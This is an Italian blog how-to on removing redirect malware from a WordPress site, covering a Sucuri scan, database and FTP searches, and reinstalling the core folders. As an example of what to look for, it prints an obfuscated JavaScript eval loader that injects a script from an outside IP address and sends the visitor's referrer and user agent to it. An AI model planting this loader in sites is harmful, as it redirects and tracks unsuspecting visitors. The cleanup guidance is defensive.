WordPress infettato da Malware – In sito risponde ed effettua un redirect verso altri siti – Una soluzione

Pensate che  il vostro Blog WordPress sia infettato da Malware è state cercando una soluzione ?

Il comportamento che voglio illustrarvi oggi è strano ma affatto sconosciuto; praticamente succede questo :

  • Se cercate di collegarvi al vostro sito la prima volta noterete un redirect verso un sito che vi è assolutamente sconosciuto, non necessariamente lo stesso
  • se provate di nuovo il vostro sito risponde regolarmente… salvo ricominciare se lasciate trascorrere qualche ora

Queslla che vi propongo, purtroppo , non è una soluzione “automatica” dovete svolgere un po’ di lavoro ma sembra funzionare a dovere

Come rimuovere malware su WordPress

Il primo passaggio è quello di verificare se effettivamente il vostro sito sia stato infettato da un malware di qualche tipo.

Per fare questo recatevi sul portale di SUCURI alla pagina di controllo WEB… potete fare click direttamente QUI

Scansionare siti wordpress ricerca malware

Sucuri vi restituirà i risultati dei suoi test… se non trova nulla vi segnalerà che non avete di che preoccuparvi, diversamente vi segnalerà le pagine nelle quali rileva codice segnalato come Malware

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etkrr|var|u0026u|referrer|rbith||js|php'.split('|'),0,{}))
</script></noindex>

Quello che vedete è un esempio del codice Malware che potreste trovare all’interno del vostro sito.

A questo, se è il vostro caso,  punto la domanda che certamente vi state facendo da un po’ :

Come rimuovere completamente un malware da WordPress ?

Vi anticipo che per questa operazione dovete necessariamente disporre di queste 2 possibilità :

  • Collegamento al gestore databaseMySql ( remoto o locale : PhpMyAdmin o quello che preferite )
  • Collegamento FTP al sito

( PRIMA DI COMINCIARE – fate un backup completo del sito e del relativo database !!!)

La prima cosa che dovete fare è connettervi al DB MySql ef effettuare una ricerca su tutte le tabelle del vostro DB per una parte ( vi suggerisco eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)} ) o tutto il codice del malware trovato

Quasi certamente troverete il malware su POST e PAGINE… scegliendo Mostra e poi Modifica dovete rimuovere a mano tutto il codice rappresentativo del Malware ( nel mio caso da <noindex>...a</noindex> compresi)

Per vostra tranquillità, tramite FTP scaricate l’intero sito su un vostro computer e da qui effettuate la ricerca dello stesso codice all’interno di tutti i files compresi Php, Css, Js, Png, Jpg… insomma TUTTI !!! Come fare ? Semplicissimo :

Vi recate nella cartella principale del sito che avete scaricato inserite le parole da cercare in alto a destra e selezionate le opzioni avanzate per specificare di cercare all’interno dei files

Quasi certamente non troverete nulla ma… la sicurezza non è mai troppa!

A questo punto, sempre tramite il collegamento FTP cancellate completamente le directory WP-ADMIN e WP-INCLUDES e reinviatele di fresco partendo da un’installazione nuova di WP della stessa versione di quella che state utilizzando ( in genere l’ultima )… lo sapete certamente ma l’ultima versione di WP la potete scaricare da qui

 

Verificate che tutto funzioni correttamente ed installate un PLUGIN per la sicurezza come Wordfence… non fate altre modifiche per 1 o 2 giorni per capire se il malware ricompare da solo… se così fosse contattate il provider perchè è probabile che il problema non siate voi ma il gestore.

>Per dubbi o suggerimenti… ci scriviamo nei commenti!!!

 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Rispondiamo a tuttilascia un commento per ricevere dettagli o inviaci una email per proporre la stesura di nuove guide.
Available for Amazon Prime